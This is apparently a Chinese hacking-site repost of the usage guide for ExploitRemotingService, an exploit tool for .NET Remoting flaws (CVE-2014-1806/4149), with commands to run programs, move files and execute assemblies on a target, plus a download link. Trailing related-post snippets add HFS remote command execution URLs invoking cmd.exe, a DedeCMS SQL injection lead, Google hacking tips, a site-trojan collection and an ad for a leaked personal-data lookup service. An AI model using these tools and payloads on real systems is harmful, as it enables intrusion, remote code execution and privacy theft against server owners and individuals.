.NET 远程服务远程执行漏洞(exp) 中国寒龙收集整理首发

Source: https://github.com/tyranid/ExploitRemotingService

Exploit Database Mirror: http://www.exploit-db.com/sploits/35280.zip

ExploitRemotingService (c) 2014 James Forshaw

=============================================

A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149.

It only works on Windows although some aspects _might_ work in Mono on *nix.

Usage Instructions:

===================

ExploitRemotingService [options] uri command [command args]

Copyright (c) James Forshaw 2014

Uri:

The supported URI are as follows:

tcp://host:port/ObjName   - TCP connection on host and portname

ipc://channel/ObjName     - Named pipe channel

Options:

-s, --secure               Enable secure mode

-p, --port=VALUE           Specify the local TCP port to listen on

-i, --ipc=VALUE            Specify listening pipe name for IPC channel

--user=VALUE           Specify username for secure mode

--pass=VALUE           Specify password for secure mode

--ver=VALUE            Specify version number for remote, 2 or 4

--usecom               Use DCOM backchannel instead of .NET remoting

--remname=VALUE        Specify the remote object name to register

-v, --verbose              Enable verbose debug output

--useser               Uses old serialization tricks, only works on

full type filter services

-h, -?, --help

Commands:

exec [-wait] program [cmdline]: Execute a process on the hosting server

cmd  cmdline                  : Execute a command line process and display stdou

t

put  localfile remotefile     : Upload a file to the hosting server

get  remotefile localfile     : Download a file from the hosting server

ls   remotedir                : List a remote directory

run  file [args]              : Upload and execute an assembly, calls entry point

user                          : Print the current username

ver                           : Print the OS version

This tool supports exploit both TCP remoting services and local IPC services. To test

the exploit you need to know the name of the .NET remoting service and the port it‘‘s

listening on (for TCP) or the name of the Named Pipe (for IPC). You can normally find

this in the server or client code. Look for things like calls to:

RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance

You can then try the exploit by constructing an appropriate URL. If TCP you can use the

URL format tcp://hostname:port/ServiceName. For IPC use ipc://NamedPipeName/ServiceName.

A simple test is to do:

ExploitRemotingService SERVICEURL ver

If successful it should print the OS version of the hosting .NET remoting service. If

you get an exception it might be fixed with CVE-2014-1806. At this point try the COM

version using:

ExploitRemotingService -usecom SERVICEURL ver

This works best locally but can work remotely if you modify the COM configuration and

disable the firewall you should be able to get it to work. If that still doesn‘‘t work

then it might be an up to date server. Instead you can also try the full serialization

version using.

ExploitRemotingService -useser SERVICEURL ls c:\

For this to work the remoting service must be running with full typefilter mode enabled

(which is some, especially IPC services). It also only works with the commands ls, put

and get. But that should be enough to compromise a box.

I‘‘ve provided an example service to test against.

下载地址:http://pan.baidu.com/s/1s9BdW

时间: 2024-12-23 22:12:40

.NET 远程服务远程执行漏洞(exp) 中国寒龙收集整理首发的相关文章

中国寒龙破解无线网络wep密码最新执行漏洞-出处中国寒龙

近些年无线技术发展迅速,越来越多的用户使用无线设备在自己家建立起无线网络,通过搭建无线网络可以在家里的每个角落使用笔记本和无线网卡访问internet.有很多文章都向大家介绍了无线安全之中的通过设置WEP加密来保证其他计算机以及非法用户无法连接我们建立的无线网络. 但是事实真的如此吗?WEP这个所谓的安全加密措施真的是万无一失吗?笔者通过很长时间的研究发现原来WEP并不安全.我们可以通过几个工具加上一些手法来破解他,这样就可以在神不知鬼不觉的情况下,入侵已经进行WEP加密的无线网络.下面笔者就分

国外软件HFS 2.3x 远程命令执行漏洞 (本程序某些YY黑阔大牛抓鸡抓IP工具中使用到本软件)本站教程教习如何梨园远程命令执行。。中国寒龙

这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔. 1 2 http://localhost:80/?search==%00{.exec|cmd.} http://localhost:80/search=%00{.exec|cmd.} 注:有些版本search前面是没有?的. 测试部分:百度搜HFS默认就是2.3x版本,执行echo测试成功: 1 http://localhost:8080/?search==%00{.exec|cmd.exe%20/c%20echo>c:/1.txt%20123

dedecms5.7最新guestbook.php文件sql注射漏洞利用 中国寒龙

影响版本为5.7 漏洞文件edit.inc.php具体代码: < ?php if(!defined('DEDEINC')) exit('Request Error!'); if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS']; else $GUEST_BOOK_POS = "guestbook.php"; $id = intval($id); if(empty($jo

[中国寒龙联盟出品]C语言基础知识视频教程第一课-C语言简史,特点,基本结构,函数printf()和scanf()使用和c语言的开发过程。

本视频由中国寒龙收集整理发布,更多请关注我们的博客和,我们的官网:www.hackerschina.org  感谢朋友们的支持!

Struts2远程执行漏洞

第一种攻击方式:新建一个文件,在文件中写入一下自己的东西加上&data=要写入文件he1p.jsp文件中的内容 攻击地址?class.classLoader.jarPath=(  %23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D+new+java.lang.Boolean(false)%2C+  %23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2

记一次被劫持挂马经历--Elasticsearch的远程执行漏洞

起因: 公司使用的是Ucloud的云主机服务,今天上午突然被告知有一台服务器的出口流量激增,对外发包量短时间内达到了100万,而且都是UDP类型的,第一感觉就是:诶呀,莫不是被黑了,被当肉鸡了呀! 探究: 立马登录对应的服务器,首先使用iftop查看流量状况 可以看出出口流量好吓人,1分钟内累计700M流量,查了一下这2个IP地址,一个是在美国,一个是在浙江电信: 赶紧查看正在运行的进程,找出疑似进程,还真有所发现: [.ECC6DFE919A382]这个进程还想冒充系统进程,疑点极大,而且/t

利用谷歌实现批量入侵的方法 -中国寒龙

route print 查看本机设置网络 intext:这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含"动网"的网页.allintext:使用方法和intext类似. intitle: 和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含"安全天使"的网页.同理allintitle:也同intitle类似. ca

网页挂马大全集 -中国寒龙出品 转载写明出处www.hackerschina.org

一:框架挂马<iframe src=地址 width=0 height=0></iframe>二:js文件挂马首先将以下代码document.write("<iframe width='0' height='0' src='地址'></iframe>");保存为xxx.js,则JS挂马代码为<script language=javascript src=xxx.js></script>三:js变形加密<SCR

中国寒龙反网络病毒联盟官网www.hackerschina.org更新公告。社工库更新公告。

大家好欢迎使用中国寒龙反网络病毒联盟在线平台. 本平台为国际公益网站SEC平台 在这里本站近期更新的社工库包括:天涯数据 乌云网会员数据 南宫数据 中南股份数据 QQ数据 和某住址社工MM数据 以及个人数据  如果再本站搜索不到您想要的资料说明本站未曾更新您相关的数据资料 不过在此您对本站搜索关键字的使用需要有一定的技巧设置如:搜索 人名字  QQ号  手机号 身份证号等等产品序列号等等,本产品序列号和商家号只供搜索中南股份和南宫的数据.谢谢使用本站. 另外本站在年底期间将会升级服务器,,升级期